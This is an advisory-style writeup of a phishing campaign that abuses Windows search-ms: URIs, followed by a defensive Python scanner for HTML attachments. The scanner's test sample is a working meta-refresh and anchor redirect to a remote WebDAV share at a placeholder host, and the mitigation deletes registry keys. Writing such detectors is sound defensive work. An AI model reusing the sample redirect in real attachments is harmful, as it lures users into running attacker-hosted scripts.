Search & Spoof: Abuse of Windows Search to Redirect to Malware

Date: June 11, 2024
CVE: Not specified
Vulnerability Type: URL Redirection to Untrusted Site
CWE: [[CWE-601]]
Sources: SpiderLabs Blog

Synopsis

A phishing campaign delivers ZIP-archived HTML attachments that use the Windows search: and search-ms: URI protocols to hand the browser off to Windows Explorer, which then displays a search result served from an attacker-controlled server. The user is shown a single file and tricked into running it. No flaw in the protocol handler itself is required; the attack relies on the handler being reachable from the browser and on the user accepting the prompt and running the file.

Issue Summary

The campaign starts with a phishing email carrying a ZIP archive that contains an HTML file disguised as a routine document. When opened, the HTML file does not execute anything itself: it uses a `<meta http-equiv="refresh">` tag to immediately redirect the browser to a search: protocol URL, which the browser passes to Windows Explorer. An `<a>` anchor carrying the same URL is included as a fallback in case the browser blocks the automatic redirect, so the user is asked to click it instead.

Technical Key Findings

The redirect target uses the search: (search-ms:) protocol, which Windows Explorer handles natively, so the browser redirect ends in an Explorer search window rather than on a web page. The URL's parameters control what that window shows: query sets the search term, crumb and location point the search at a path on a server the attacker controls, and displayname sets the title of the results window, so the listing can be labelled to look like a trusted local folder. The search returns a single item, and the attack concludes with the user being prompted to run a batch script disguised as a shortcut file.

![[Figure 5. Search window displaying results after invoking the search query..webp]]

Vulnerable Products

Any Windows system on which the search: and search-ms: URI protocol handlers are registered (the default configuration) is affected, because Windows Explorer processes these URIs without validating that the location they point to is trustworthy; the browser only asks the user to confirm the handoff to Explorer.

Impact Assessment

If the user runs the file presented in the search window, the attacker gains arbitrary script execution in the user's context, which can compromise the system and enable follow-on activity such as data theft or installation of additional malware.

Patches or Workaround

Mitigation involves disabling the search and search-ms URI handlers by deleting the associated registry keys with the following commands (run from an elevated prompt). Because this also breaks legitimate uses of the search protocol, back up the keys first (for example with reg export) so they can be restored if needed:

reg delete HKEY_CLASSES_ROOT\search /f
reg delete HKEY_CLASSES_ROOT\search-ms /f

Additionally, email gateways and attachment scanners can be updated to detect and block HTML attachments, including those nested in ZIP archives, whose meta refresh or anchor targets use the search: or search-ms: scheme.
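As an added example that is not part of the original SpiderLabs report or its tooling, the following Python scanner implements the attachment check described above and, along the way, decodes the search-ms: parameters discussed under Technical Key Findings. It extracts every meta-refresh and anchor target from an HTML attachment, parses any search:/search-ms: URI into its query, crumb/location and displayname parameters, and flags the file when the search is pointed at a remote location. The sample HTML, the host example.invalid and the share path are constructed placeholders, not indicators from the campaign.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Constructed sample attachment (not the campaign's real file). The hostname
# example.invalid and the share path are placeholders chosen for this example.
SAMPLE_HTML = """<html><head>
<meta http-equiv="refresh"
      content="0; url=search-ms:query=Invoice&crumb=location:%5C%5Cexample.invalid%40SSL%5CDavWWWRoot%5Cshare&displayname=Downloads">
</head><body>
<p>If nothing happens,
<a href="search-ms:query=Invoice&crumb=location:%5C%5Cexample.invalid%40SSL%5CDavWWWRoot%5Cshare&displayname=Downloads">click here</a>
to open the document.</p>
</body></html>"""

SEARCH_SCHEMES = {"search", "search-ms"}


class RedirectExtractor(HTMLParser):
    """Collects every navigation target a browser would follow: meta-refresh
    URLs and anchor hrefs, in document order."""

    def __init__(self):
        super().__init__()
        self.targets = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            # content looks like "0; url=<target>", target optionally quoted
            m = re.search(r"url\s*=\s*['\"]?([^'\"]+)", a.get("content", ""), re.I)
            if m:
                self.targets.append(m.group(1).strip())
        elif tag == "a" and a.get("href"):
            self.targets.append(a["href"].strip())


def is_remote(location):
    """True if the search location resolves outside the local machine
    (UNC path, forward-slash UNC, or an http(s) URL)."""
    loc = location.strip().lower()
    return loc.startswith(("\\\\", "//", "http://", "https://"))


def parse_search_uri(uri):
    """Split a search:/search-ms: URI into its parameters; return None for any
    other scheme. The location comes from a 'location' parameter or from a
    'crumb=location:<path>' parameter, both percent-decoded."""
    scheme, sep, rest = uri.partition(":")
    scheme = scheme.strip().lower()
    if not sep or scheme not in SEARCH_SCHEMES:
        return None
    params = {}
    for part in rest.split("&"):
        key, _, value = part.partition("=")
        params[key.strip().lower()] = unquote(value)
    location = params.get("location")
    crumb = params.get("crumb", "")
    if location is None and crumb.lower().startswith("location:"):
        location = crumb[len("location:"):]
    location = location or ""
    return {
        "uri": uri,
        "scheme": scheme,
        "query": params.get("query", ""),
        "displayname": params.get("displayname", ""),
        "location": location,
        "remote": is_remote(location),
    }


def analyze_html(html):
    """Return one finding per search-protocol navigation target in the HTML."""
    extractor = RedirectExtractor()
    extractor.feed(html)
    findings = []
    for target in extractor.targets:
        parsed = parse_search_uri(target)
        if parsed is not None:
            findings.append(parsed)
    return findings


def is_suspicious(html):
    """Scanner verdict: block when any search-protocol target points Explorer
    at a remote location."""
    return any(f["remote"] for f in analyze_html(html))


if __name__ == "__main__":
    for f in analyze_html(SAMPLE_HTML):
        print(f"{f['scheme']}: query={f['query']!r} displayname={f['displayname']!r} "
              f"location={f['location']!r} remote={f['remote']}")
    print("verdict:", "BLOCK" if is_suspicious(SAMPLE_HTML) else "allow")
```

Both the meta-refresh target and the anchor fallback are checked, since blocking only the automatic redirect leaves the click-through path intact. A search: URI whose location is a local path (for example a drive letter) is parsed but not flagged, which keeps the check focused on the remote-share pattern this campaign depends on.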

Tags

#Windows #Malware #Phishing #URLRedirection #CyberSecurity #Cloudflare #IPFS #Trustwave

Search & Spoof: Abuse of Windows Search to Redirect to Malware

Trustwave SpiderLabs has detected a sophisticated malware campaign that leverages the Windows search functionality embedded in HTML code to deploy malware.